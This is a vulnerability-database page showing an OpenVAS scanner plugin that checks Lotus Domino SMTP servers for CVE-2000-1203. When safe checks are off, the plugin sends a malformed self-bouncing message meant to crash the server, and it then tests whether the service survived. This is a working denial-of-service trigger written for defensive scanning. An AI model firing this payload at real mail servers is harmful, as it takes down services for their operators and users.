Lotus Domino SMTP bounce DoS
🗓️ 03 Nov 2005 00:00:00Reported by Copyright (C) 2003 Michel ArboiType
openvas🔗 plugins.openvas.org👁 22 Views
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2000-1203 | 1 Sep 200404:00 | – | cve | |
| CVE-2000-1203 | 1 Sep 200404:00 | – | cvelist | |
| EUVD-2000-1188 | 7 Oct 202500:30 | – | euvd | |
| Lotus Domino SMTP Server Forged Localhost Mail Header DoS | 11 Jun 200300:00 | – | nessus | |
| CVE-2000-1203 | 20 Aug 200104:00 | – | nvd |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/3212 |
# SPDX-FileCopyrightText: 2003 Michel Arboi
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:ibm:lotus_domino";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.11717");
script_version("2023-10-31T05:06:37+0000");
script_tag(name:"last_modification", value:"2023-10-31 05:06:37 +0000 (Tue, 31 Oct 2023)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/3212");
script_cve_id("CVE-2000-1203");
script_name("Lotus Domino SMTP bounce DoS");
script_category(ACT_MIXED_ATTACK);
script_copyright("Copyright (C) 2003 Michel Arboi");
script_family("Denial of Service");
script_dependencies("smtp_relay.nasl", "gb_hcl_domino_consolidation.nasl", "check_smtp_helo.nasl");
script_mandatory_keys("hcl/domino/detected");
script_tag(name:"impact", value:"An attacker may use this flaw to crash the service continuously.");
script_tag(name:"solution", value:"Reconfigure your MTA or upgrade it.");
script_tag(name:"summary", value:"The remote SMTP server (maybe a Lotus Domino) can be killed
or disabled by a malformed message that bounces to himself. The routing loop exhausts all resources.");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"Mitigation");
exit(0);
}
include("smtp_func.inc");
include("misc_func.inc");
include("host_details.inc");
if( ! port = get_app_port( cpe:CPE, service:"smtp" ) )
exit( 0 );
if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
exit( 0 );
banner = smtp_get_banner( port:port );
if ( ! banner || "Lotus Domino" >!< banner )
exit( 0 );
# nb: Disable the test if the server relays e-mails or if safe checks are enabled
if( get_kb_item( "smtp/" + port + "/spam" ) || safe_checks() ) {
if( egrep( pattern:"^220.*Lotus Domino Release ([0-4]\.|5\.0\.[0-8][^0-9])", string:banner ) ) {
security_message( port:port );
exit( 0 );
}
exit( 99 );
}
s = smtp_open( port:port, data:NULL );
if( ! s )
exit( 0 );
smtp_close( socket:s, check_data:FALSE );
vtstrings = get_vt_strings();
fromaddr = string( "bounce", rand(), "@[127.0.0.1]" );
toaddr = string( vtstrings["lowercase_rand"], "@invalid", rand(), ".net" );
b = string( "From: ", vtstrings["lowercase"], "\r\n",
"To: postmaster\r\n",
"Subject: SMTP bounce denial of service\r\n\r\ntest\r\n" );
n = smtp_send_port( port:port, from:fromaddr, to:toaddr, body:b );
sleep( 1 );
s = smtp_open( port:port, data:NULL );
if( s ) {
smtp_close( socket:s, check_data:FALSE );
exit( 99 );
}
security_message( port:port );
exit( 0 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Oct 2023 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 25
EPSS0.02471